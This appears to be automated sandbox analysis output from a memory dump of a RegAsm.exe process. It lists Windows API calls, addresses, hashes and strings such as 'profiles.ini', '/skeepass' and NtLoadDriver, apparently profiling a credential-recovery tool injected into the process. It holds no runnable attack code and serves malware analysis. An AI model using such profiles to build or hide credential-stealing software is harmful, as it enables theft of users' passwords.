                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                      • GetWindowRect.USER32(?,?), ref: 00414088
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                      • GetDC.USER32 ref: 004140E3
                      • wcslen.MSVCRT ref: 00414123
                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                      • ReleaseDC.USER32(?,?), ref: 00414181
                      • _snwprintf.MSVCRT ref: 00414244
                      • SetWindowTextW.USER32(?,?), ref: 00414258
                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                      • GetClientRect.USER32(?,?), ref: 004142E1
                      • GetWindowRect.USER32(?,?), ref: 004142EB
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                      • GetClientRect.USER32(?,?), ref: 0041433B
                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                      • String ID: %s:$EDIT$STATIC
                      • API String ID: 2080319088-3046471546
                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                      APIs
                      • EndDialog.USER32(?,?), ref: 00413221
                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                      • memset.MSVCRT ref: 00413292
                      • memset.MSVCRT ref: 004132B4
                      • memset.MSVCRT ref: 004132CD
                      • memset.MSVCRT ref: 004132E1
                      • memset.MSVCRT ref: 004132FB
                      • memset.MSVCRT ref: 00413310
                      • GetCurrentProcess.KERNEL32 ref: 00413318
                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                      • memset.MSVCRT ref: 004133C0
                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                      • memcpy.MSVCRT ref: 004133FC
                      • wcscpy.MSVCRT ref: 0041341F
                      • _snwprintf.MSVCRT ref: 0041348E
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                      • SetFocus.USER32(00000000), ref: 004134B7
                      Strings
                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                      • {Unknown}, xrefs: 004132A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                      • API String ID: 4111938811-1819279800
                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                      APIs
                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                      • EndDialog.USER32(?,?), ref: 0040135E
                      • DeleteObject.GDI32(?), ref: 0040136A
                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                      • ShowWindow.USER32(00000000), ref: 00401398
                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                      • ShowWindow.USER32(00000000), ref: 004013A7
                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                      • String ID:
                      • API String ID: 829165378-0
                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                      APIs
                      • memset.MSVCRT ref: 00404172
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • wcscpy.MSVCRT ref: 004041D6
                      • wcscpy.MSVCRT ref: 004041E7
                      • memset.MSVCRT ref: 00404200
                      • memset.MSVCRT ref: 00404215
                      • _snwprintf.MSVCRT ref: 0040422F
                      • wcscpy.MSVCRT ref: 00404242
                      • memset.MSVCRT ref: 0040426E
                      • memset.MSVCRT ref: 004042CD
                      • memset.MSVCRT ref: 004042E2
                      • _snwprintf.MSVCRT ref: 004042FE
                      • wcscpy.MSVCRT ref: 00404311
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                      • API String ID: 2454223109-1580313836
                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                      APIs
                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                      • SetMenu.USER32(?,00000000), ref: 00411453
                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                      • memcpy.MSVCRT ref: 004115C8
                      • ShowWindow.USER32(?,?), ref: 004115FE
                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                      • API String ID: 4054529287-3175352466
                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                      APIs
                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$HandleModule
                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                      • API String ID: 667068680-2887671607
                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _snwprintf$memset$wcscpy
                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                      • API String ID: 2000436516-3842416460
                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                      APIs
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                      • String ID:
                      • API String ID: 1043902810-0
                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • memset.MSVCRT ref: 004085CF
                      • memset.MSVCRT ref: 004085F1
                      • memset.MSVCRT ref: 00408606
                      • strcmp.MSVCRT ref: 00408645
                      • _mbscpy.MSVCRT ref: 004086DB
                      • _mbscpy.MSVCRT ref: 004086FA
                      • memset.MSVCRT ref: 0040870E
                      • strcmp.MSVCRT ref: 0040876B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                      • String ID: ---
                      • API String ID: 3437578500-2854292027
                      • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                      • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                      • API String ID: 2081463915-1959339147
                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                      APIs
                      • GetDC.USER32(00000000), ref: 004121FF
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                      • SelectObject.GDI32(?,?), ref: 00412251
                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                      • SetCursor.USER32(00000000), ref: 004122BC
                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                      • memcpy.MSVCRT ref: 0041234D
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                      • String ID:
                      • API String ID: 1700100422-0
                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004111E0
                      • GetWindowRect.USER32(?,?), ref: 004111F6
                      • GetWindowRect.USER32(?,?), ref: 0041120C
                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                      • GetWindowRect.USER32(00000000), ref: 0041124D
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                      • String ID:
                      • API String ID: 552707033-0
                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                      APIs
                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                      • KillTimer.USER32(?,00000041), ref: 004060D7
                      • KillTimer.USER32(?,00000041), ref: 004060E8
                      • GetTickCount.KERNEL32 ref: 0040610B
                      • GetParent.USER32(?), ref: 00406136
                      • SendMessageW.USER32(00000000), ref: 0040613D
                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                      • String ID: A
                      • API String ID: 2892645895-3554254475
                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                      APIs
                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                      • memcpy.MSVCRT ref: 0040C11B
                      • strchr.MSVCRT ref: 0040C140
                      • strchr.MSVCRT ref: 0040C151
                      • _strlwr.MSVCRT ref: 0040C15F
                      • memset.MSVCRT ref: 0040C17A
                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                      • String ID: 4$h
                      • API String ID: 4019544885-1856150674
                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                      • String ID: 0$6
                      • API String ID: 4066108131-3849865405
                      • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                      • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                      APIs
                      • memset.MSVCRT ref: 004082EF
                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • memset.MSVCRT ref: 00408362
                      • memset.MSVCRT ref: 00408377
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiWide
                      • String ID:
                      • API String ID: 290601579-0
                      • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                      • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
